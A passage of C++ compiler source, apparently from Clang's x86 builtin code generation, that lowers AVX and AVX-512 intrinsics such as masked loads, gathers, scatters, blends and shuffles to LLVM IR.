case X86::BI__builtin_ia32_vfmaddps512_maskz:
case X86::BI__builtin_ia32_vfmaddps512_mask3:
case X86::BI__builtin_ia32_vfmsubps512_mask3:
case X86::BI__builtin_ia32_vfmaddpd512_mask:
case X86::BI__builtin_ia32_vfmaddpd512_maskz:
case X86::BI__builtin_ia32_vfmaddpd512_mask3:
case X86::BI__builtin_ia32_vfmsubpd512_mask3:
case X86::BI__builtin_ia32_vfmsubph512_mask3:
return EmitX86FMAExpr(*this, E, Ops, BuiltinID, /*IsAddSub*/ false);
case X86::BI__builtin_ia32_vfmaddsubph512_mask:
case X86::BI__builtin_ia32_vfmaddsubph512_maskz:
case X86::BI__builtin_ia32_vfmaddsubph512_mask3:
case X86::BI__builtin_ia32_vfmsubaddph512_mask3:
case X86::BI__builtin_ia32_vfmaddsubps512_mask:
case X86::BI__builtin_ia32_vfmaddsubps512_maskz:
case X86::BI__builtin_ia32_vfmaddsubps512_mask3:
case X86::BI__builtin_ia32_vfmsubaddps512_mask3:
case X86::BI__builtin_ia32_vfmaddsubpd512_mask:
case X86::BI__builtin_ia32_vfmaddsubpd512_maskz:
case X86::BI__builtin_ia32_vfmaddsubpd512_mask3:
case X86::BI__builtin_ia32_vfmsubaddpd512_mask3:
return EmitX86FMAExpr(*this, E, Ops, BuiltinID, /*IsAddSub*/ true);
case X86::BI__builtin_ia32_movdqa32store128_mask:
case X86::BI__builtin_ia32_movdqa64store128_mask:
case X86::BI__builtin_ia32_storeaps128_mask:
case X86::BI__builtin_ia32_storeapd128_mask:
case X86::BI__builtin_ia32_movdqa32store256_mask:
case X86::BI__builtin_ia32_movdqa64store256_mask:
case X86::BI__builtin_ia32_storeaps256_mask:
case X86::BI__builtin_ia32_storeapd256_mask:
case X86::BI__builtin_ia32_movdqa32store512_mask:
case X86::BI__builtin_ia32_movdqa64store512_mask:
case X86::BI__builtin_ia32_storeaps512_mask:
case X86::BI__builtin_ia32_storeapd512_mask:
return EmitX86MaskedStore(
*this, Ops,
getContext().getTypeAlignInChars(E->getArg(1)->getType()).getAsAlign());
case X86::BI__builtin_ia32_loadups128_mask:
case X86::BI__builtin_ia32_loadups256_mask:
case X86::BI__builtin_ia32_loadups512_mask:
case X86::BI__builtin_ia32_loadupd128_mask:
case X86::BI__builtin_ia32_loadupd256_mask:
case X86::BI__builtin_ia32_loadupd512_mask:
case X86::BI__builtin_ia32_loaddquqi128_mask:
case X86::BI__builtin_ia32_loaddquqi256_mask:
case X86::BI__builtin_ia32_loaddquqi512_mask:
case X86::BI__builtin_ia32_loaddquhi128_mask:
case X86::BI__builtin_ia32_loaddquhi256_mask:
case X86::BI__builtin_ia32_loaddquhi512_mask:
case X86::BI__builtin_ia32_loaddqusi128_mask:
case X86::BI__builtin_ia32_loaddqusi256_mask:
case X86::BI__builtin_ia32_loaddqusi512_mask:
case X86::BI__builtin_ia32_loaddqudi128_mask:
case X86::BI__builtin_ia32_loaddqudi256_mask:
case X86::BI__builtin_ia32_loaddqudi512_mask:
return EmitX86MaskedLoad(*this, Ops, Align(1));
case X86::BI__builtin_ia32_loadsh128_mask:
case X86::BI__builtin_ia32_loadss128_mask:
case X86::BI__builtin_ia32_loadsd128_mask:
return EmitX86MaskedLoad(*this, Ops, Align(1));
case X86::BI__builtin_ia32_loadaps128_mask:
case X86::BI__builtin_ia32_loadaps256_mask:
case X86::BI__builtin_ia32_loadaps512_mask:
case X86::BI__builtin_ia32_loadapd128_mask:
case X86::BI__builtin_ia32_loadapd256_mask:
case X86::BI__builtin_ia32_loadapd512_mask:
case X86::BI__builtin_ia32_movdqa32load128_mask:
case X86::BI__builtin_ia32_movdqa32load256_mask:
case X86::BI__builtin_ia32_movdqa32load512_mask:
case X86::BI__builtin_ia32_movdqa64load128_mask:
case X86::BI__builtin_ia32_movdqa64load256_mask:
case X86::BI__builtin_ia32_movdqa64load512_mask:
return EmitX86MaskedLoad(
*this, Ops,
getContext().getTypeAlignInChars(E->getArg(1)->getType()).getAsAlign());
case X86::BI__builtin_ia32_expandloaddf128_mask:
case X86::BI__builtin_ia32_expandloaddf256_mask:
case X86::BI__builtin_ia32_expandloaddf512_mask:
case X86::BI__builtin_ia32_expandloadsf128_mask:
case X86::BI__builtin_ia32_expandloadsf256_mask:
case X86::BI__builtin_ia32_expandloadsf512_mask:
case X86::BI__builtin_ia32_expandloaddi128_mask:
case X86::BI__builtin_ia32_expandloaddi256_mask:
case X86::BI__builtin_ia32_expandloaddi512_mask:
case X86::BI__builtin_ia32_expandloadsi128_mask:
case X86::BI__builtin_ia32_expandloadsi256_mask:
case X86::BI__builtin_ia32_expandloadsi512_mask:
case X86::BI__builtin_ia32_expandloadhi128_mask:
case X86::BI__builtin_ia32_expandloadhi256_mask:
case X86::BI__builtin_ia32_expandloadhi512_mask:
case X86::BI__builtin_ia32_expandloadqi128_mask:
case X86::BI__builtin_ia32_expandloadqi256_mask:
case X86::BI__builtin_ia32_expandloadqi512_mask:
return EmitX86ExpandLoad(*this, Ops);
case X86::BI__builtin_ia32_compressstoredf128_mask:
case X86::BI__builtin_ia32_compressstoredf256_mask:
case X86::BI__builtin_ia32_compressstoredf512_mask:
case X86::BI__builtin_ia32_compressstoresf128_mask:
case X86::BI__builtin_ia32_compressstoresf256_mask:
case X86::BI__builtin_ia32_compressstoresf512_mask:
case X86::BI__builtin_ia32_compressstoredi128_mask:
case X86::BI__builtin_ia32_compressstoredi256_mask:
case X86::BI__builtin_ia32_compressstoredi512_mask:
case X86::BI__builtin_ia32_compressstoresi128_mask:
case X86::BI__builtin_ia32_compressstoresi256_mask:
case X86::BI__builtin_ia32_compressstoresi512_mask:
case X86::BI__builtin_ia32_compressstorehi128_mask:
case X86::BI__builtin_ia32_compressstorehi256_mask:
case X86::BI__builtin_ia32_compressstorehi512_mask:
case X86::BI__builtin_ia32_compressstoreqi128_mask:
case X86::BI__builtin_ia32_compressstoreqi256_mask:
case X86::BI__builtin_ia32_compressstoreqi512_mask:
return EmitX86CompressStore(*this, Ops);
case X86::BI__builtin_ia32_expanddf128_mask:
case X86::BI__builtin_ia32_expanddf256_mask:
case X86::BI__builtin_ia32_expanddf512_mask:
case X86::BI__builtin_ia32_expandsf128_mask:
case X86::BI__builtin_ia32_expandsf256_mask:
case X86::BI__builtin_ia32_expandsf512_mask:
case X86::BI__builtin_ia32_expanddi128_mask:
case X86::BI__builtin_ia32_expanddi256_mask:
case X86::BI__builtin_ia32_expanddi512_mask:
case X86::BI__builtin_ia32_expandsi128_mask:
case X86::BI__builtin_ia32_expandsi256_mask:
case X86::BI__builtin_ia32_expandsi512_mask:
case X86::BI__builtin_ia32_expandhi128_mask:
case X86::BI__builtin_ia32_expandhi256_mask:
case X86::BI__builtin_ia32_expandhi512_mask:
case X86::BI__builtin_ia32_expandqi128_mask:
case X86::BI__builtin_ia32_expandqi256_mask:
case X86::BI__builtin_ia32_expandqi512_mask:
return EmitX86CompressExpand(*this, Ops, /*IsCompress*/false);
case X86::BI__builtin_ia32_compressdf128_mask:
case X86::BI__builtin_ia32_compressdf256_mask:
case X86::BI__builtin_ia32_compressdf512_mask:
case X86::BI__builtin_ia32_compresssf128_mask:
case X86::BI__builtin_ia32_compresssf256_mask:
case X86::BI__builtin_ia32_compresssf512_mask:
case X86::BI__builtin_ia32_compressdi128_mask:
case X86::BI__builtin_ia32_compressdi256_mask:
case X86::BI__builtin_ia32_compressdi512_mask:
case X86::BI__builtin_ia32_compresssi128_mask:
case X86::BI__builtin_ia32_compresssi256_mask:
case X86::BI__builtin_ia32_compresssi512_mask:
case X86::BI__builtin_ia32_compresshi128_mask:
case X86::BI__builtin_ia32_compresshi256_mask:
case X86::BI__builtin_ia32_compresshi512_mask:
case X86::BI__builtin_ia32_compressqi128_mask:
case X86::BI__builtin_ia32_compressqi256_mask:
case X86::BI__builtin_ia32_compressqi512_mask:
return EmitX86CompressExpand(*this, Ops, /*IsCompress*/true);
case X86::BI__builtin_ia32_gather3div2df:
case X86::BI__builtin_ia32_gather3div2di:
case X86::BI__builtin_ia32_gather3div4df:
case X86::BI__builtin_ia32_gather3div4di:
case X86::BI__builtin_ia32_gather3div4sf:
case X86::BI__builtin_ia32_gather3div4si:
case X86::BI__builtin_ia32_gather3div8sf:
case X86::BI__builtin_ia32_gather3div8si:
case X86::BI__builtin_ia32_gather3siv2df:
case X86::BI__builtin_ia32_gather3siv2di:
case X86::BI__builtin_ia32_gather3siv4df:
case X86::BI__builtin_ia32_gather3siv4di:
case X86::BI__builtin_ia32_gather3siv4sf:
case X86::BI__builtin_ia32_gather3siv4si:
case X86::BI__builtin_ia32_gather3siv8sf:
case X86::BI__builtin_ia32_gather3siv8si:
case X86::BI__builtin_ia32_gathersiv8df:
case X86::BI__builtin_ia32_gathersiv16sf:
case X86::BI__builtin_ia32_gatherdiv8df:
case X86::BI__builtin_ia32_gatherdiv16sf:
case X86::BI__builtin_ia32_gathersiv8di:
case X86::BI__builtin_ia32_gathersiv16si:
case X86::BI__builtin_ia32_gatherdiv8di:
case X86::BI__builtin_ia32_gatherdiv16si: {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unexpected builtin");
case X86::BI__builtin_ia32_gather3div2df:
IID = Intrinsic::x86_avx512_mask_gather3div2_df;
break;
case X86::BI__builtin_ia32_gather3div2di:
IID = Intrinsic::x86_avx512_mask_gather3div2_di;
break;
case X86::BI__builtin_ia32_gather3div4df:
IID = Intrinsic::x86_avx512_mask_gather3div4_df;
break;
case X86::BI__builtin_ia32_gather3div4di:
IID = Intrinsic::x86_avx512_mask_gather3div4_di;
break;
case X86::BI__builtin_ia32_gather3div4sf:
IID = Intrinsic::x86_avx512_mask_gather3div4_sf;
break;
case X86::BI__builtin_ia32_gather3div4si:
IID = Intrinsic::x86_avx512_mask_gather3div4_si;
break;
case X86::BI__builtin_ia32_gather3div8sf:
IID = Intrinsic::x86_avx512_mask_gather3div8_sf;
break;
case X86::BI__builtin_ia32_gather3div8si:
IID = Intrinsic::x86_avx512_mask_gather3div8_si;
break;
case X86::BI__builtin_ia32_gather3siv2df:
IID = Intrinsic::x86_avx512_mask_gather3siv2_df;
break;
case X86::BI__builtin_ia32_gather3siv2di:
IID = Intrinsic::x86_avx512_mask_gather3siv2_di;
break;
case X86::BI__builtin_ia32_gather3siv4df:
IID = Intrinsic::x86_avx512_mask_gather3siv4_df;
break;
case X86::BI__builtin_ia32_gather3siv4di:
IID = Intrinsic::x86_avx512_mask_gather3siv4_di;
break;
case X86::BI__builtin_ia32_gather3siv4sf:
IID = Intrinsic::x86_avx512_mask_gather3siv4_sf;
break;
case X86::BI__builtin_ia32_gather3siv4si:
IID = Intrinsic::x86_avx512_mask_gather3siv4_si;
break;
case X86::BI__builtin_ia32_gather3siv8sf:
IID = Intrinsic::x86_avx512_mask_gather3siv8_sf;
break;
case X86::BI__builtin_ia32_gather3siv8si:
IID = Intrinsic::x86_avx512_mask_gather3siv8_si;
break;
case X86::BI__builtin_ia32_gathersiv8df:
IID = Intrinsic::x86_avx512_mask_gather_dpd_512;
break;
case X86::BI__builtin_ia32_gathersiv16sf:
IID = Intrinsic::x86_avx512_mask_gather_dps_512;
break;
case X86::BI__builtin_ia32_gatherdiv8df:
IID = Intrinsic::x86_avx512_mask_gather_qpd_512;
break;
case X86::BI__builtin_ia32_gatherdiv16sf:
IID = Intrinsic::x86_avx512_mask_gather_qps_512;
break;
case X86::BI__builtin_ia32_gathersiv8di:
IID = Intrinsic::x86_avx512_mask_gather_dpq_512;
break;
case X86::BI__builtin_ia32_gathersiv16si:
IID = Intrinsic::x86_avx512_mask_gather_dpi_512;
break;
case X86::BI__builtin_ia32_gatherdiv8di:
IID = Intrinsic::x86_avx512_mask_gather_qpq_512;
break;
case X86::BI__builtin_ia32_gatherdiv16si:
IID = Intrinsic::x86_avx512_mask_gather_qpi_512;
break;
}
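// The intrinsic's mask operand is as wide as the narrower of the
// destination (Ops[0]) and index (Ops[2]) vectors, so normalize the
// incoming integer mask (Ops[3]) to that width.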
unsigned MinElts = std::min(
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements(),
cast<llvm::FixedVectorType>(Ops[2]->getType())->getNumElements());
Ops[3] = getMaskVecValue(*this, Ops[3], MinElts);
Function *Intr = CGM.getIntrinsic(IID);
return Builder.CreateCall(Intr, Ops);
}
case X86::BI__builtin_ia32_scattersiv8df:
case X86::BI__builtin_ia32_scattersiv16sf:
case X86::BI__builtin_ia32_scatterdiv8df:
case X86::BI__builtin_ia32_scatterdiv16sf:
case X86::BI__builtin_ia32_scattersiv8di:
case X86::BI__builtin_ia32_scattersiv16si:
case X86::BI__builtin_ia32_scatterdiv8di:
case X86::BI__builtin_ia32_scatterdiv16si:
case X86::BI__builtin_ia32_scatterdiv2df:
case X86::BI__builtin_ia32_scatterdiv2di:
case X86::BI__builtin_ia32_scatterdiv4df:
case X86::BI__builtin_ia32_scatterdiv4di:
case X86::BI__builtin_ia32_scatterdiv4sf:
case X86::BI__builtin_ia32_scatterdiv4si:
case X86::BI__builtin_ia32_scatterdiv8sf:
case X86::BI__builtin_ia32_scatterdiv8si:
case X86::BI__builtin_ia32_scattersiv2df:
case X86::BI__builtin_ia32_scattersiv2di:
case X86::BI__builtin_ia32_scattersiv4df:
case X86::BI__builtin_ia32_scattersiv4di:
case X86::BI__builtin_ia32_scattersiv4sf:
case X86::BI__builtin_ia32_scattersiv4si:
case X86::BI__builtin_ia32_scattersiv8sf:
case X86::BI__builtin_ia32_scattersiv8si: {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unexpected builtin");
case X86::BI__builtin_ia32_scattersiv8df:
IID = Intrinsic::x86_avx512_mask_scatter_dpd_512;
break;
case X86::BI__builtin_ia32_scattersiv16sf:
IID = Intrinsic::x86_avx512_mask_scatter_dps_512;
break;
case X86::BI__builtin_ia32_scatterdiv8df:
IID = Intrinsic::x86_avx512_mask_scatter_qpd_512;
break;
case X86::BI__builtin_ia32_scatterdiv16sf:
IID = Intrinsic::x86_avx512_mask_scatter_qps_512;
break;
case X86::BI__builtin_ia32_scattersiv8di:
IID = Intrinsic::x86_avx512_mask_scatter_dpq_512;
break;
case X86::BI__builtin_ia32_scattersiv16si:
IID = Intrinsic::x86_avx512_mask_scatter_dpi_512;
break;
case X86::BI__builtin_ia32_scatterdiv8di:
IID = Intrinsic::x86_avx512_mask_scatter_qpq_512;
break;
case X86::BI__builtin_ia32_scatterdiv16si:
IID = Intrinsic::x86_avx512_mask_scatter_qpi_512;
break;
case X86::BI__builtin_ia32_scatterdiv2df:
IID = Intrinsic::x86_avx512_mask_scatterdiv2_df;
break;
case X86::BI__builtin_ia32_scatterdiv2di:
IID = Intrinsic::x86_avx512_mask_scatterdiv2_di;
break;
case X86::BI__builtin_ia32_scatterdiv4df:
IID = Intrinsic::x86_avx512_mask_scatterdiv4_df;
break;
case X86::BI__builtin_ia32_scatterdiv4di:
IID = Intrinsic::x86_avx512_mask_scatterdiv4_di;
break;
case X86::BI__builtin_ia32_scatterdiv4sf:
IID = Intrinsic::x86_avx512_mask_scatterdiv4_sf;
break;
case X86::BI__builtin_ia32_scatterdiv4si:
IID = Intrinsic::x86_avx512_mask_scatterdiv4_si;
break;
case X86::BI__builtin_ia32_scatterdiv8sf:
IID = Intrinsic::x86_avx512_mask_scatterdiv8_sf;
break;
case X86::BI__builtin_ia32_scatterdiv8si:
IID = Intrinsic::x86_avx512_mask_scatterdiv8_si;
break;
case X86::BI__builtin_ia32_scattersiv2df:
IID = Intrinsic::x86_avx512_mask_scattersiv2_df;
break;
case X86::BI__builtin_ia32_scattersiv2di:
IID = Intrinsic::x86_avx512_mask_scattersiv2_di;
break;
case X86::BI__builtin_ia32_scattersiv4df:
IID = Intrinsic::x86_avx512_mask_scattersiv4_df;
break;
case X86::BI__builtin_ia32_scattersiv4di:
IID = Intrinsic::x86_avx512_mask_scattersiv4_di;
break;
case X86::BI__builtin_ia32_scattersiv4sf:
IID = Intrinsic::x86_avx512_mask_scattersiv4_sf;
break;
case X86::BI__builtin_ia32_scattersiv4si:
IID = Intrinsic::x86_avx512_mask_scattersiv4_si;
break;
case X86::BI__builtin_ia32_scattersiv8sf:
IID = Intrinsic::x86_avx512_mask_scattersiv8_sf;
break;
case X86::BI__builtin_ia32_scattersiv8si:
IID = Intrinsic::x86_avx512_mask_scattersiv8_si;
break;
}
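// As with the gathers, the mask (Ops[1]) is as wide as the narrower of
// the index (Ops[2]) and source value (Ops[3]) vectors.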
unsigned MinElts = std::min(
cast<llvm::FixedVectorType>(Ops[2]->getType())->getNumElements(),
cast<llvm::FixedVectorType>(Ops[3]->getType())->getNumElements());
Ops[1] = getMaskVecValue(*this, Ops[1], MinElts);
Function *Intr = CGM.getIntrinsic(IID);
return Builder.CreateCall(Intr, Ops);
}
case X86::BI__builtin_ia32_vextractf128_pd256:
case X86::BI__builtin_ia32_vextractf128_ps256:
case X86::BI__builtin_ia32_vextractf128_si256:
case X86::BI__builtin_ia32_extract128i256:
case X86::BI__builtin_ia32_extractf64x4_mask:
case X86::BI__builtin_ia32_extractf32x4_mask:
case X86::BI__builtin_ia32_extracti64x4_mask:
case X86::BI__builtin_ia32_extracti32x4_mask:
case X86::BI__builtin_ia32_extractf32x8_mask:
case X86::BI__builtin_ia32_extracti32x8_mask:
case X86::BI__builtin_ia32_extractf32x4_256_mask:
case X86::BI__builtin_ia32_extracti32x4_256_mask:
case X86::BI__builtin_ia32_extractf64x2_256_mask:
case X86::BI__builtin_ia32_extracti64x2_256_mask:
case X86::BI__builtin_ia32_extractf64x2_512_mask:
case X86::BI__builtin_ia32_extracti64x2_512_mask: {
auto *DstTy = cast<llvm::FixedVectorType>(ConvertType(E->getType()));
unsigned NumElts = DstTy->getNumElements();
unsigned SrcNumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
unsigned SubVectors = SrcNumElts / NumElts;
unsigned Index = cast<ConstantInt>(Ops[1])->getZExtValue();
assert(llvm::isPowerOf2_32(SubVectors) && "Expected power of 2 subvectors");
Index &= SubVectors - 1; // Remove any extra bits.
Index *= NumElts;
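// e.g. extracting subvector 1 of a v8f64 into a v4f64: SubVectors = 2,
// Index becomes 4, and the shuffle below selects elements 4..7.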
int Indices[16];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = i + Index;
Value *Res = Builder.CreateShuffleVector(Ops[0],
makeArrayRef(Indices, NumElts),
"extract");
if (Ops.size() == 4)
Res = EmitX86Select(*this, Ops[3], Res, Ops[2]);
return Res;
}
case X86::BI__builtin_ia32_vinsertf128_pd256:
case X86::BI__builtin_ia32_vinsertf128_ps256:
case X86::BI__builtin_ia32_vinsertf128_si256:
case X86::BI__builtin_ia32_insert128i256:
case X86::BI__builtin_ia32_insertf64x4:
case X86::BI__builtin_ia32_insertf32x4:
case X86::BI__builtin_ia32_inserti64x4:
case X86::BI__builtin_ia32_inserti32x4:
case X86::BI__builtin_ia32_insertf32x8:
case X86::BI__builtin_ia32_inserti32x8:
case X86::BI__builtin_ia32_insertf32x4_256:
case X86::BI__builtin_ia32_inserti32x4_256:
case X86::BI__builtin_ia32_insertf64x2_256:
case X86::BI__builtin_ia32_inserti64x2_256:
case X86::BI__builtin_ia32_insertf64x2_512:
case X86::BI__builtin_ia32_inserti64x2_512: {
unsigned DstNumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
unsigned SrcNumElts =
cast<llvm::FixedVectorType>(Ops[1]->getType())->getNumElements();
unsigned SubVectors = DstNumElts / SrcNumElts;
unsigned Index = cast<ConstantInt>(Ops[2])->getZExtValue();
assert(llvm::isPowerOf2_32(SubVectors) && "Expected power of 2 subvectors");
Index &= SubVectors - 1; // Remove any extra bits.
Index *= SrcNumElts;
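// e.g. inserting a v4f32 into half 1 of a v8f32: SubVectors = 2 and Index
// becomes 4; the first shuffle widens the source, the second splices its
// elements into positions 4..7 of the destination.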
int Indices[16];
for (unsigned i = 0; i != DstNumElts; ++i)
Indices[i] = (i >= SrcNumElts) ? SrcNumElts + (i % SrcNumElts) : i;
Value *Op1 = Builder.CreateShuffleVector(Ops[1],
makeArrayRef(Indices, DstNumElts),
"widen");
for (unsigned i = 0; i != DstNumElts; ++i) {
if (i >= Index && i < (Index + SrcNumElts))
Indices[i] = (i - Index) + DstNumElts;
else
Indices[i] = i;
}
return Builder.CreateShuffleVector(Ops[0], Op1,
makeArrayRef(Indices, DstNumElts),
"insert");
}
case X86::BI__builtin_ia32_pmovqd512_mask:
case X86::BI__builtin_ia32_pmovwb512_mask: {
Value *Res = Builder.CreateTrunc(Ops[0], Ops[1]->getType());
return EmitX86Select(*this, Ops[2], Res, Ops[1]);
}
case X86::BI__builtin_ia32_pmovdb512_mask:
case X86::BI__builtin_ia32_pmovdw512_mask:
case X86::BI__builtin_ia32_pmovqw512_mask: {
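// With an all-ones mask these are plain vector truncations; otherwise use
// the masked intrinsic so the pass-through operand (Ops[1]) is applied.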
if (const auto *C = dyn_cast<Constant>(Ops[2]))
if (C->isAllOnesValue())
return Builder.CreateTrunc(Ops[0], Ops[1]->getType());
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_pmovdb512_mask:
IID = Intrinsic::x86_avx512_mask_pmov_db_512;
break;
case X86::BI__builtin_ia32_pmovdw512_mask:
IID = Intrinsic::x86_avx512_mask_pmov_dw_512;
break;
case X86::BI__builtin_ia32_pmovqw512_mask:
IID = Intrinsic::x86_avx512_mask_pmov_qw_512;
break;
}
Function *Intr = CGM.getIntrinsic(IID);
return Builder.CreateCall(Intr, Ops);
}
case X86::BI__builtin_ia32_pblendw128:
case X86::BI__builtin_ia32_blendpd:
case X86::BI__builtin_ia32_blendps:
case X86::BI__builtin_ia32_blendpd256:
case X86::BI__builtin_ia32_blendps256:
case X86::BI__builtin_ia32_pblendw256:
case X86::BI__builtin_ia32_pblendd128:
case X86::BI__builtin_ia32_pblendd256: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
unsigned Imm = cast<llvm::ConstantInt>(Ops[2])->getZExtValue();
int Indices[16];
// If there are more than 8 elements, the immediate is used twice so make
// sure we handle that.
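// e.g. Imm = 0b0101 on a 4-element blend selects
// {Ops[1][0], Ops[0][1], Ops[1][2], Ops[0][3]}.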
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = ((Imm >> (i % 8)) & 0x1) ? NumElts + i : i;
return Builder.CreateShuffleVector(Ops[0], Ops[1],
makeArrayRef(Indices, NumElts),
"blend");
}
case X86::BI__builtin_ia32_pshuflw:
case X86::BI__builtin_ia32_pshuflw256:
case X86::BI__builtin_ia32_pshuflw512: {
uint32_t Imm = cast<llvm::ConstantInt>(Ops[1])->getZExtValue();
auto *Ty = cast<llvm::FixedVectorType>(Ops[0]->getType());
unsigned NumElts = Ty->getNumElements();
// Splat the 8 bits of the immediate 4 times to help the loop wrap around.
Imm = (Imm & 0xff) * 0x01010101;
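// e.g. Imm = 0x1B reorders the low four words of each lane to {3,2,1,0}
// and leaves words 4..7 of the lane unchanged.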
int Indices[32];
for (unsigned l = 0; l != NumElts; l += 8) {
for (unsigned i = 0; i != 4; ++i) {
Indices[l + i] = l + (Imm & 3);
Imm >>= 2;
}
for (unsigned i = 4; i != 8; ++i)
Indices[l + i] = l + i;
}
return Builder.CreateShuffleVector(Ops[0], makeArrayRef(Indices, NumElts),
"pshuflw");
}
case X86::BI__builtin_ia32_pshufhw:
case X86::BI__builtin_ia32_pshufhw256:
case X86::BI__builtin_ia32_pshufhw512: {
uint32_t Imm = cast<llvm::ConstantInt>(Ops[1])->getZExtValue();
auto *Ty = cast<llvm::FixedVectorType>(Ops[0]->getType());
unsigned NumElts = Ty->getNumElements();
// Splat the 8 bits of the immediate 4 times to help the loop wrap around.
Imm = (Imm & 0xff) * 0x01010101;
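// e.g. Imm = 0x1B leaves the low four words of each lane unchanged and
// reorders the high words to {7,6,5,4}.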
int Indices[32];
for (unsigned l = 0; l != NumElts; l += 8) {
for (unsigned i = 0; i != 4; ++i)
Indices[l + i] = l + i;
for (unsigned i = 4; i != 8; ++i) {
Indices[l + i] = l + 4 + (Imm & 3);
Imm >>= 2;
}
}
return Builder.CreateShuffleVector(Ops[0], makeArrayRef(Indices, NumElts),
"pshufhw");
}
case X86::BI__builtin_ia32_pshufd:
case X86::BI__builtin_ia32_pshufd256:
case X86::BI__builtin_ia32_pshufd512:
case X86::BI__builtin_ia32_vpermilpd:
case X86::BI__builtin_ia32_vpermilps:
case X86::BI__builtin_ia32_vpermilpd256:
case X86::BI__builtin_ia32_vpermilps256:
case X86::BI__builtin_ia32_vpermilpd512:
case X86::BI__builtin_ia32_vpermilps512: {
uint32_t Imm = cast<llvm::ConstantInt>(Ops[1])->getZExtValue();
auto *Ty = cast<llvm::FixedVectorType>(Ops[0]->getType());
unsigned NumElts = Ty->getNumElements();
unsigned NumLanes = Ty->getPrimitiveSizeInBits() / 128;
unsigned NumLaneElts = NumElts / NumLanes;
// Splat the 8 bits of the immediate 4 times to help the loop wrap around.
Imm = (Imm & 0xff) * 0x01010101;
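// e.g. pshufd with Imm = 0x1B reverses each 128-bit lane: the per-lane
// indices are {3,2,1,0}.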
int Indices[16];
for (unsigned l = 0; l != NumElts; l += NumLaneElts) {
for (unsigned i = 0; i != NumLaneElts; ++i) {
Indices[i + l] = (Imm % NumLaneElts) + l;
Imm /= NumLaneElts;
}
}
return Builder.CreateShuffleVector(Ops[0], makeArrayRef(Indices, NumElts),
"permil");
}
case X86::BI__builtin_ia32_shufpd:
case X86::BI__builtin_ia32_shufpd256:
case X86::BI__builtin_ia32_shufpd512:
case X86::BI__builtin_ia32_shufps:
case X86::BI__builtin_ia32_shufps256:
case X86::BI__builtin_ia32_shufps512: {
uint32_t Imm = cast<llvm::ConstantInt>(Ops[2])->getZExtValue();
auto *Ty = cast<llvm::FixedVectorType>(Ops[0]->getType());
unsigned NumElts = Ty->getNumElements();
unsigned NumLanes = Ty->getPrimitiveSizeInBits() / 128;
unsigned NumLaneElts = NumElts / NumLanes;
// Splat the 8 bits of the immediate 4 times to help the loop wrap around.
Imm = (Imm & 0xff) * 0x01010101;
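// e.g. shufps with Imm = 0xE4 yields {Ops[0][0], Ops[0][1], Ops[1][2],
// Ops[1][3]} in each 128-bit lane.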
int Indices[16];
for (unsigned l = 0; l != NumElts; l += NumLaneElts) {
for (unsigned i = 0; i != NumLaneElts; ++i) {
unsigned Index = Imm % NumLaneElts;
Imm /= NumLaneElts;
if (i >= (NumLaneElts / 2))
Index += NumElts;
Indices[l + i] = l + Index;
}
}
return Builder.CreateShuffleVector(Ops[0], Ops[1],
makeArrayRef(Indices, NumElts),
"shufp");
}
case X86::BI__builtin_ia32_permdi256:
case X86::BI__builtin_ia32_permdf256:
case X86::BI__builtin_ia32_permdi512:
case X86::BI__builtin_ia32_permdf512: {
unsigned Imm = cast<llvm::ConstantInt>(Ops[1])->getZExtValue();
auto *Ty = cast<llvm::FixedVectorType>(Ops[0]->getType());
unsigned NumElts = Ty->getNumElements();
// These intrinsics operate on 256-bit lanes of four 64-bit elements.
int Indices[8];
for (unsigned l = 0; l != NumElts; l += 4)
for (unsigned i = 0; i != 4; ++i)
Indices[l + i] = l + ((Imm >> (2 * i)) & 0x3);
return Builder.CreateShuffleVector(Ops[0], makeArrayRef(Indices, NumElts),
"perm");
}
case X86::BI__builtin_ia32_palignr128:
case X86::BI__builtin_ia32_palignr256:
case X86::BI__builtin_ia32_palignr512: {
unsigned ShiftVal = cast<llvm::ConstantInt>(Ops[2])->getZExtValue() & 0xff;
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
assert(NumElts % 16 == 0);
// If palignr is shifting the pair of vectors more than the size of two
// lanes, emit zero.
if (ShiftVal >= 32)
return llvm::Constant::getNullValue(ConvertType(E->getType()));
// If palignr is shifting the pair of input vectors more than one lane,
// but less than two lanes, convert to shifting in zeroes.
if (ShiftVal > 16) {
ShiftVal -= 16;
Ops[1] = Ops[0];
Ops[0] = llvm::Constant::getNullValue(Ops[0]->getType());
}
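// e.g. ShiftVal = 4 on 128-bit palignr selects bytes
// {Ops[1][4..15], Ops[0][0..3]} of the Ops[0]:Ops[1] concatenation.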
int Indices[64];
// 256-bit and 512-bit palignr operate on 128-bit lanes, so handle each lane separately.
for (unsigned l = 0; l != NumElts; l += 16) {
for (unsigned i = 0; i != 16; ++i) {
unsigned Idx = ShiftVal + i;
if (Idx >= 16)
Idx += NumElts - 16; // End of lane, switch operand.
Indices[l + i] = Idx + l;
}
}
return Builder.CreateShuffleVector(Ops[1], Ops[0],
makeArrayRef(Indices, NumElts),
"palignr");
}
case X86::BI__builtin_ia32_alignd128:
case X86::BI__builtin_ia32_alignd256:
case X86::BI__builtin_ia32_alignd512:
case X86::BI__builtin_ia32_alignq128:
case X86::BI__builtin_ia32_alignq256:
case X86::BI__builtin_ia32_alignq512: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
unsigned ShiftVal = cast<llvm::ConstantInt>(Ops[2])->getZExtValue() & 0xff;
// Mask the shift amount to the element count of the vector.
ShiftVal &= NumElts - 1;
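// e.g. ShiftVal = 1 on a 4-element valign yields
// {Ops[1][1], Ops[1][2], Ops[1][3], Ops[0][0]}.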
int Indices[16];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = i + ShiftVal;
return Builder.CreateShuffleVector(Ops[1], Ops[0],
makeArrayRef(Indices, NumElts),
"valign");
}
case X86::BI__builtin_ia32_shuf_f32x4_256:
case X86::BI__builtin_ia32_shuf_f64x2_256:
case X86::BI__builtin_ia32_shuf_i32x4_256:
